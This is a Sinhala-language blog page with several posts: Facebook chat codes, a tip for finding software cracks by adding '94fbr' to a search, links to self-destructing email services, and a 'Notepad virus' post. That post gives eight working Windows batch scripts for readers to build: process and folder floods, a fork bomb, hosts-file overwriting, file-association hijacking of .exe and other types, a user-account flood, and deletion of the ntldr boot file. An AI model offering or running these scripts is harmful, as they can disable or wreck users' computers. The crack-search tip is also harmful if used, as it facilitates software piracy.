}); }); /* ]]> */

Social Icons

Saturday, May 25, 2013

Fb Chat Codes අපිම හදමුද??


ඔයාල කැමතිද චැට් කරන ගමන් ඔයාලගෙම ෆොටෝ එකක්  තමන්ගෙ යාලුවට හරි පෙන්නන්න?
වැඩ දාපු අකුරු වලින් Message යවන සුපුරුදු කලු පාට වෙනුවට නිල් පාට Msg කරන්න,මෙන්න site එක  try කරලාම බලන්න...


නිල් පාට Msg කරන්න  @@[1:[0:1: write here ]]  write here  කියන තැන ඔයාලට ඕනි දේ  type කරල Publish කරන්න.




   

http://smileychatcodes.com/facebook-smiley-chat-codes/

Comment එකක් දාලම යන්න

Software එකක crack 1 විනාඩ්යෙන් හොයමුද??


පොඩි දෙයක් කරන්න තියෙන්නේ  www.google.com යන්න දැන් ඔයාට trial හොයන්න අවශ්‍ය software එකෙ Name එක type කරලා අන්තිමට 94fbr කියලා  type කරලා search  කරන්න...

ex:
window xp  94fbr



අපේ පි‍ටුවට LIKE කරලම යන්න.


Comment එකක් දාලම යන්න

ආරක්ෂිතව රහසිගත Email යවමුද?

 
අපගේ බොහෝ රහසිගත පණිවිඩ හුවමාරු කරගැනීමට අප යොදාගන්නේ අන්තර්ජාලයයි. සැබැවින්ම අන්තර්ජාලය ආරක්ෂිත ස්ථානයක් නොවන වග ඔබ දන්නවා ඇති. නමුත් රහසිගත පණිවිඩ පණිවිඩ හුවමාරු කරගැනීමට අපිට අන්තර්ජාලය  යෙදා ගන්නම වෙනවා. මෙන්න එකට විසඳුමක් ඔබ කෙනෙක්ට email එකක් යැවූ විට එය කියවූ පසු තව කෙනෙක්ට බැලීමට නොහැකි ලෙස පණිවිඩය ස්වයංක්‍රීයවම delete වෙන ක්‍රමයක්. මෙම සෙවාව මගින් password දමා  Email යැවීමට සහ Email එක කියවූ පසු ඒ බව Email මාර්ගයෙන් අපිට දැනුම් දීමටත් ඔවුන් කටයුතු කරනවා,,,





මෙන්න Site එක .ඔයාලත් Try කරලා බලන්නකෝ ,අපේ පි‍ටුවට LIKE කරලම යන්න..

 http://notedip.com/

         https://privnote.com/

Comment එකක් දාලම යන්න

Saturday, May 4, 2013

Notepad virus ගැන අවබෝධයක් ලබා ගන්න


Notepad එක බාවිත කර  virus නිර්මාණය කිරීම පිලිබද කලින් post වලින් විස්තර කලා  virus ගැන දල අවබෝදයක් ලබා ගන්න ගමන් අදත් අලුත් virus ටිකක් හදමු.

01  මෙකෙන් notepad window 100ක් විතර open වෙනවා.pc එක speed  නැත්තම් මේක කරන්න එපා.වැඩේ පටන් ගමු.

 Notepad එක Open කරලා එකට මේ Code එක past කරගන්න.
 @ECHO off
:top
START %SystemRoot%\system32\notepad.exeGOTO top

දැන් virus.bat කියලා save කරන්න .


02 DNS Poisoning ,Web Site block කරන්න පුලුවන්

@echo off

echo xxx.xxx.xxx.xxx www.website.com > C:\windows\system32\drivers\etc\hosts

DNS Poisoning.bat ආකාරයෙන් save කරන්න 


xxx.xxx.xxx.xxx වෙනුවට IP address එකත් www.website.com වෙනුවට  අපිට block කල යුතු Web Site ලිපිනයත් එකතු කරන්න

  
03  Application Bomber , මෙහිදී සිදු වන්නේ නම් කර ඇති එක් එක් වැඩසටහන් ඉබේම ක්‍රියාත්මක වෙන එකයි.

@echo off

:x

start winword

start mspaint

start notepad

start write

start cmd

start explorer

start control

start calc

goto x
   
Application Bomber .bat ආකාරයෙන් save කරන්න

04 Folder flooder ,මෙතනදී සිදුවන්නේත් දිගින් දිගටම folders 1000 නිර්මානය වීමයි

@echo off

:x

md %1000%

goto x

Folder flooder .bat ආකාරයෙන් save කරන්න


05 Fork Bomb,මේ මගින් Pc  Memory වගේම CPU දාරිතාවයත් 100% බාවිතා කරන බව පෙන්නනවා.

%0|%0

Fork Bomb.bat ආකාරයෙන් save කරන්න 

06 Extension Changer, පරිගණකයේම සියලුම files .mpeg උනොත්? anything කියන තැනට අපිට මාරු කරන්න ඕනේ extention එක යොදන්න. 
E.X-     assoc .txt=.mpeg

@echo off

assoc .txt=anything

assoc .exe=anything

assoc .jpeg=anything

assoc .png=anything

assoc .mpeg=anything

Extension Changer..bat ආකාරයෙන් save කරන්න 

07 User account ,මෙතනදී සිදුවන්නේත් දිගින් දිගටම User account flooder 1000 නිර්මානය වීමයි

@echo off

:x

net user %1000% /add

goto x

User account .bat ආකාරයෙන් save කරන්න


08 Deleting boot files,

attrib -S -R -H C:\ntldr

del ntldr

Deleting boot files.bat ආකාරයෙන් save කරන්න 


 සැ .යු
මේ virus  ක්‍රියාකාරිත්වය අත්හදා බලන්න යන්න නම් එපා

Comment එකක් දාලම යන්න

Popular Posts

අපිත් එක්ක එකතු වෙන්න

 
back to top